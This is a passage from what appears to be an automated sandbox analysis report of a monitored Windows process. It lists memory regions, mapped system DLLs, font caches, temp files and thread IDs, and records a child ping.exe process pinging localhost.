"\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1458 start_va = 0x7ecf4000 end_va = 0x7ecf6fff entry_point = 0x0 region_type = private name = "private_0x000000007ecf4000" filename = "" Region: id = 1459 start_va = 0x2eb0000 end_va = 0x2eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002eb0000" filename = "" Region: id = 1460 start_va = 0x30d0000 end_va = 0x30e9fff entry_point = 0x30d0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000028.db" filename = "\\Users\\5JgHKoaOfdp\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000028.db" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000028.db") Region: id = 1461 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 1462 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003100000" filename = "" Region: id = 1463 start_va = 0x3110000 end_va = 0x350bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003110000" filename = "" Region: id = 1464 start_va = 0x3510000 end_va = 0x354ffff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1465 start_va = 0x3550000 end_va = 0x358ffff entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 1466 start_va = 0x74f30000 end_va = 0x74f69fff entry_point = 0x74f30000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1467 start_va = 0x75780000 end_va = 0x7592cfff entry_point = 0x75780000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1468 start_va = 0x7ecf1000 end_va = 0x7ecf3fff entry_point = 0x0 region_type = private name = "private_0x000000007ecf1000" filename = "" Region: id = 1516 start_va = 0x3510000 end_va = 0x3510fff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1517 start_va = 0x3520000 end_va = 0x355ffff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 1518 start_va = 0x3560000 end_va = 0x359ffff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 1519 start_va = 0x35a0000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 1520 start_va = 0x35e0000 end_va = 0x361ffff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 1521 start_va = 0x3620000 end_va = 0x3623fff entry_point = 0x3620000 region_type = mapped_file name = "photoviewer.dll.mui" filename = "\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui") Region: id = 1522 start_va = 0x3630000 end_va = 0x372ffff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1523 start_va = 0x3780000 end_va = 0x378ffff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 1524 start_va = 0x73c20000 end_va = 0x73d91fff entry_point = 0x73c20000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 1525 start_va = 0x7ecee000 end_va = 0x7ecf0fff entry_point = 0x0 region_type = private name = "private_0x000000007ecee000" filename = "" Region: id = 1526 start_va = 0x3730000 end_va = 0x3733fff entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 1527 start_va = 0x3740000 end_va = 0x3740fff entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1528 start_va = 0x3750000 end_va = 0x3750fff entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 1529 start_va = 0x3760000 end_va = 0x3760fff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1530 start_va = 0x3770000 end_va = 0x3770fff entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1531 start_va = 0x3790000 end_va = 0x3834fff entry_point = 0x3790000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\~fontcache-system.dat") Region: id = 1532 start_va = 0x3840000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 1533 start_va = 0x3940000 end_va = 0x493ffff entry_point = 0x3940000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\~fontcache-fontface.dat") Region: id = 1534 start_va = 0x4940000 end_va = 0x494ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 1535 start_va = 0x4950000 end_va = 0x495ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 1536 start_va = 0x4960000 end_va = 0x496ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004960000" filename = "" Region: id = 1537 start_va = 0x4970000 end_va = 0x4970fff entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1538 start_va = 0x739a0000 end_va = 0x739b8fff entry_point = 0x739a0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1539 start_va = 0x739c0000 end_va = 0x73a36fff entry_point = 0x739c0000 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\SysWOW64\\mscms.dll" (normalized: "c:\\windows\\syswow64\\mscms.dll") Region: id = 1540 start_va = 0x73a40000 end_va = 0x73c1cfff entry_point = 0x73a40000 region_type = mapped_file name = "imagingengine.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll") Region: id = 1541 start_va = 0x737a0000 end_va = 0x7399cfff entry_point = 0x737a0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 1542 start_va = 0x3760000 end_va = 0x3762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003760000" filename = "" Region: id = 1543 start_va = 0x4980000 end_va = 0x4980fff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 1544 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 1545 start_va = 0x49a0000 end_va = 0x49a0fff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 1546 start_va = 0x49b0000 end_va = 0x49effff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1547 start_va = 0x49f0000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 1548 start_va = 0x4a30000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1549 start_va = 0x5230000 end_va = 0x523ffff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 1550 start_va = 0x5240000 end_va = 0x524ffff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 1551 start_va = 0x5250000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 1552 start_va = 0x5260000 end_va = 0x529ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 1553 start_va = 0x52a0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 1554 start_va = 0x52e0000 end_va = 0x564afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052e0000" filename = "" Region: id = 1555 start_va = 0x5680000 end_va = 0x5683fff entry_point = 0x5680000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1556 start_va = 0x5690000 end_va = 0x56cefff entry_point = 0x5690000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000006.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db") Region: id = 1557 start_va = 0x56d0000 end_va = 0x56d3fff entry_point = 0x56d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1558 start_va = 0x56e0000 end_va = 0x5762fff entry_point = 0x56e0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1559 start_va = 0x5770000 end_va = 0x586ffff entry_point = 0x0 region_type = private name = "private_0x0000000005770000" filename = "" Region: id = 1560 start_va = 0x5870000 end_va = 0x5871fff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 1561 start_va = 0x5880000 end_va = 0x594dfff entry_point = 0x5880000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 1562 start_va = 0x5950000 end_va = 0x614ffff entry_point = 0x5950000 region_type = mapped_file name = "~fontcache-s-1-5-21-3643094112-4209292109-138530109-1001.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\~FontCache-S-1-5-21-3643094112-4209292109-138530109-1001.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\~fontcache-s-1-5-21-3643094112-4209292109-138530109-1001.dat") Region: id = 1563 start_va = 0x6150000 end_va = 0x654ffff entry_point = 0x0 region_type = private name = "private_0x0000000006150000" filename = "" Region: id = 1564 start_va = 0x73780000 end_va = 0x7379efff entry_point = 0x73780000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 1565 start_va = 0x7ece8000 end_va = 0x7eceafff entry_point = 0x0 region_type = private name = "private_0x000000007ece8000" filename = "" Region: id = 1566 start_va = 0x7eceb000 end_va = 0x7ecedfff entry_point = 0x0 region_type = private name = "private_0x000000007eceb000" filename = "" Region: id = 1567 start_va = 0x3760000 end_va = 0x3760fff entry_point = 0x3760000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1568 start_va = 0x5650000 end_va = 0x5652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005650000" filename = "" Region: id = 1569 start_va = 0x5660000 end_va = 0x5666fff entry_point = 0x0 region_type = private name = "private_0x0000000005660000" filename = "" Region: id = 1570 start_va = 0x5670000 end_va = 0x567ffff entry_point = 0x5670000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1571 start_va = 0x6550000 end_va = 0x658ffff entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 1572 start_va = 0x6590000 end_va = 0x65cffff entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 1573 start_va = 0x65d0000 end_va = 0x65dffff entry_point = 0x65d0000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1574 start_va = 0x65e0000 end_va = 0x65effff entry_point = 0x65e0000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1575 start_va = 0x65f0000 end_va = 0x65fffff entry_point = 0x65f0000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1576 start_va = 0x6600000 end_va = 0x660ffff entry_point = 0x6600000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1577 start_va = 0x6610000 end_va = 0x661ffff entry_point = 0x6610000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1578 start_va = 0x6620000 end_va = 0x662ffff entry_point = 0x6620000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1579 start_va = 0x6630000 end_va = 0x663ffff entry_point = 0x6630000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1580 start_va = 0x6640000 end_va = 0x664ffff entry_point = 0x6640000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1581 start_va = 0x6650000 end_va = 0x665ffff entry_point = 0x6650000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1582 start_va = 0x6660000 end_va = 0x666ffff entry_point = 0x6660000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1583 start_va = 0x6670000 end_va = 0x667ffff entry_point = 0x6670000 region_type = mapped_file name = "~pia708.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA708.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia708.tmp") Region: id = 1584 start_va = 0x6680000 end_va = 0x674bfff entry_point = 0x6680000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 1585 start_va = 0x73740000 end_va = 0x7377afff entry_point = 0x73740000 region_type = mapped_file name = "icm32.dll" filename = "\\Windows\\SysWOW64\\icm32.dll" (normalized: "c:\\windows\\syswow64\\icm32.dll") Region: id = 1586 start_va = 0x7ece5000 end_va = 0x7ece7fff entry_point = 0x0 region_type = private name = "private_0x000000007ece5000" filename = "" Region: id = 1590 start_va = 0x6750000 end_va = 0x6750fff entry_point = 0x6750000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1591 start_va = 0x6760000 end_va = 0x6760fff entry_point = 0x6760000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1592 start_va = 0x6770000 end_va = 0x677ffff entry_point = 0x6770000 region_type = mapped_file name = "~pia777.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA777.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia777.tmp") Region: id = 1593 start_va = 0x6780000 end_va = 0x678ffff entry_point = 0x6780000 region_type = mapped_file name = "~pia777.tmp" filename = "\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\~PIA777.tmp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\~pia777.tmp") Region: id = 1594 start_va = 0x6790000 end_va = 0x6790fff entry_point = 0x6790000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1595 start_va = 0x67a0000 end_va = 0x67a0fff entry_point = 0x67a0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1596 start_va = 0x67b0000 end_va = 0x6ca1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000067b0000" filename = "" Region: id = 1597 start_va = 0x6cb0000 end_va = 0x6cb0fff entry_point = 0x6cb0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1598 start_va = 0x6cc0000 end_va = 0x6cc0fff entry_point = 0x6cc0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1599 start_va = 0x6cd0000 end_va = 0x6f9afff entry_point = 0x0 region_type = private name = "private_0x0000000006cd0000" filename = "" Region: id = 1600 start_va = 0x6fa0000 end_va = 0x6faffff entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 1601 start_va = 0x6fb0000 end_va = 0x6fbffff entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 1602 start_va = 0x6fc0000 end_va = 0x705efff entry_point = 0x0 region_type = private name = "private_0x0000000006fc0000" filename = "" Region: id = 1603 start_va = 0x7ecd0000 end_va = 0x7ecdffff entry_point = 0x0 region_type = private name = "private_0x000000007ecd0000" filename = "" Thread: id = 40 os_tid = 0x9d0 Thread: id = 41 os_tid = 0x9b8 Thread: id = 42 os_tid = 0x9c4 Thread: id = 43 os_tid = 0x9c8 Thread: id = 44 os_tid = 0x64c Thread: id = 45 os_tid = 0x8d0 Thread: id = 46 os_tid = 0x9bc Thread: id = 47 os_tid = 0x9b4 Thread: id = 49 os_tid = 0x4cc Thread: id = 50 os_tid = 0x988 Thread: id = 51 os_tid = 0x940 Thread: id = 53 os_tid = 0x8cc Thread: id = 55 os_tid = 0x8c8 Thread: id = 56 os_tid = 0x464 Thread: id = 57 os_tid = 0x448 Thread: id = 58 os_tid = 0xb14 Thread: id = 59 os_tid = 0x578 Thread: id = 60 os_tid = 0x2cc Thread: id = 68 os_tid = 0xab8 Thread: id = 69 os_tid = 0xac8 Thread: id = 70 os_tid = 0xad8 Thread: id = 71 os_tid = 0xae8 Thread: id = 73 os_tid = 0xb20 Thread: id = 74 os_tid = 0x954 Thread: id = 76 os_tid = 0xb38 Thread: id = 77 os_tid = 0x8a0 Thread: id = 78 os_tid = 0x88c Thread: id = 79 os_tid = 0x894 Thread: id = 81 os_tid = 0xc8 Process: id = "35" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x115e1000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 10 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1469 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1470 start_va = 0xc00000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1471 start_va = 0xc20000 end_va = 0xc21fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 1472 start_va = 0xc30000 end_va = 0xc3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 1473 start_va = 0xc40000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1474 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 1475 start_va = 0xcc0000 end_va = 0xcc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 1476 start_va = 0xcd0000 end_va = 0xcd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 1477 start_va = 0xce0000 end_va = 0xce1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 1478 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1479 start_va = 0x7f980000 end_va = 0x7f9a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f980000" filename = "" Region: id = 1480 start_va = 0x7f9a7000 end_va = 0x7f9a7fff entry_point = 0x0 region_type = private name = "private_0x000000007f9a7000" filename = "" Region: id = 1481 start_va = 0x7f9aa000 end_va = 0x7f9acfff entry_point = 0x0 region_type = private name = "private_0x000000007f9aa000" filename = "" Region: id = 1482 start_va = 0x7f9ad000 end_va = 0x7f9adfff entry_point = 0x0 region_type = private name = "private_0x000000007f9ad000" filename = "" Region: id = 1483 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1484 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1485 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1486 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1487 start_va = 0xd70000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 1488 start_va = 0xe20000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1489 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1490 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1491 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1492 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 1493 start_va = 0xc10000 end_va = 0xc13fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1494 start_va = 0xcf0000 end_va = 0xd6dfff entry_point = 0xcf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1495 start_va = 0xfe0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1496 start_va = 0x73df0000 end_va = 0x73df7fff entry_point = 0x73df0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1497 start_va = 0x73e00000 end_va = 0x73e1dfff entry_point = 0x73e00000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1498 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1499 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1500 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1501 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1502 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1503 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1504 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1505 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1506 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1507 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1508 start_va = 0x7f880000 end_va = 0x7f97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f880000" filename = "" 